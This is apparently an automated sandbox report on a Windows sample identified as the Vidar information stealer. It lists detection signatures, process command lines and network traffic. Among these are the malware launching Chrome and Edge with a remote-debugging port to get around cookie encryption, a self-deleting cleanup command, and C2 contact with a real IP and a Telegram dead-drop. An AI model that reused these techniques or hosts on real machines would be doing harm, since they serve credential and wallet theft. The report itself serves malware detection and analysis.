Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
pyjnkasedf.exe

Overview

General Information

Sample name:pyjnkasedf.exe
Analysis ID:1565852
MD5:3a94ac80a1bbe958b6544874f311be69
SHA1:bc6352ee84bed107a4b30b545934698c4e664baf
SHA256:1839ee5c3534ad1a6929c9de33bce63cf6f96cce1ae3dc8240f4cf352250db0f
Tags:exeuser-aachum
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Vidar stealer
AI detected suspicious sample
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Monitors registry run keys for changes
PE file has a writeable .text section
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Browser Started with Remote Debugging
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • pyjnkasedf.exe (PID: 7496 cmdline: "C:\Users\user\Desktop\pyjnkasedf.exe" MD5: 3A94AC80A1BBE958B6544874F311BE69)
    • chrome.exe (PID: 8164 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
      • chrome.exe (PID: 5936 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2388 --field-trial-handle=2144,i,14125693394083356275,3437472649324227348,262144 /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • msedge.exe (PID: 7420 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)
      • msedge.exe (PID: 4456 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2376 --field-trial-handle=2240,i,3036203601739144337,7572605890428226246,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • cmd.exe (PID: 8768 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\EGCFHDAKECFI" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 660 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • msedge.exe (PID: 4668 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 2116 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2432 --field-trial-handle=2252,i,8509466360616789321,11479808896737917615,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 8380 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6632 --field-trial-handle=2252,i,8509466360616789321,11479808896737917615,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 8412 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6800 --field-trial-handle=2252,i,8509466360616789321,11479808896737917615,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 8996 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceuserer --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6136 --field-trial-handle=2252,i,8509466360616789321,11479808896737917615,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
      00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: pyjnkasedf.exe PID: 7496JoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
          Process Memory Space: pyjnkasedf.exe PID: 7496JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

            System Summary

            barindex
            Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\pyjnkasedf.exe", ParentImage: C:\Users\user\Desktop\pyjnkasedf.exe, ParentProcessId: 7496, ParentProcessName: pyjnkasedf.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 8164, ProcessName: chrome.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-30T22:38:15.005438+010020442471Malware Command and Control Activity Detected94.130.210.71443192.168.2.1049719TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-30T22:38:17.364768+010020518311Malware Command and Control Activity Detected94.130.210.71443192.168.2.1049725TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-30T22:38:15.005242+010020490871A Network Trojan was detected192.168.2.104971994.130.210.71443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: pyjnkasedf.exeReversingLabs: Detection: 57%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: pyjnkasedf.exeJoe Sandbox ML: detected
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00425435 CryptUnprotectData,0_2_00425435
            Source: pyjnkasedf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 173.222.162.55:443 -> 192.168.2.10:49960 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.10:49704 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 94.130.210.71:443 -> 192.168.2.10:49705 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.10:49706 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.10:49738 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.10:49770 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.10:49782 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 173.222.162.55:443 -> 192.168.2.10:49784 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 20.190.147.7:443 -> 192.168.2.10:49814 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.10:49974 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.10:62201 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.10:62225 version: TLS 1.2
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004022FC FindFirstFileA,0_2_004022FC
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00429305 FindFirstFileA,0_2_00429305
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00425791 FindFirstFileA,FindFirstFileA,0_2_00425791
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0043A85B FindFirstFileA,memset,memset,0_2_0043A85B
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00431951 FindFirstFileA,0_2_00431951
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00423AC1 FindFirstFileA,0_2_00423AC1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00430C61 wsprintfA,wsprintfA,FindFirstFileA,0_2_00430C61
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00436D1E FindFirstFileA,0_2_00436D1E
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00426E63 FindFirstFileA,0_2_00426E63
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004024A9 FindFirstFileA,0_2_004024A9
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004288E9 FindFirstFileA,FindFirstFileA,0_2_004288E9
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\Jump to behavior

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.10:49719 -> 94.130.210.71:443
            Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 94.130.210.71:443 -> 192.168.2.10:49719
            Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 94.130.210.71:443 -> 192.168.2.10:49725
            Source: global trafficTCP traffic: 192.168.2.10:62186 -> 1.1.1.1:53
            Source: global trafficHTTP traffic detected: GET /gv4dlp HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
            Source: Joe Sandbox ViewIP Address: 13.107.246.40 13.107.246.40
            Source: Joe Sandbox ViewIP Address: 13.107.246.40 13.107.246.40
            Source: Joe Sandbox ViewIP Address: 23.96.180.189 23.96.180.189
            Source: Joe Sandbox ViewIP Address: 152.195.19.97 152.195.19.97
            Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
            Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownHTTPS traffic detected: 173.222.162.55:443 -> 192.168.2.10:49960 version: TLS 1.0
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.55
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.55
            Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.85
            Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.85
            Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.85
            Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.85
            Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
            Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
            Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
            Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.85
            Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
            Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
            Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
            Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
            Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
            Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
            Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
            Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
            Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
            Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
            Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
            Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
            Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
            Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
            Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
            Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
            Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
            Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
            Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
            Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
            Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
            Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
            Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
            Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
            Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
            Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
            Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
            Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
            Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
            Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
            Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
            Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
            Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
            Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
            Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
            Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
            Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
            Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
            Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
            Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004151EC InternetReadFile,0_2_004151EC
            Source: global trafficHTTP traffic detected: GET /gv4dlp HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: gladim.sbsConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CJe2yQEIo7bJAQipncoBCJr0ygEIlKHLAQiFoM0BCNy9zQEIucrNAQi/0M0BCMbRzQEIutTNAQjK1s0BCKfYzQEI+cDUFRjymM0BGLnSzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CJe2yQEIo7bJAQipncoBCJr0ygEIlKHLAQiFoM0BCNy9zQEIucrNAQi/0M0BCMbRzQEIutTNAQjK1s0BCKfYzQEI+cDUFRjymM0BGLnSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=YDsEo1WlfzddsTn&MD=WvWXA6YO HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
            Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
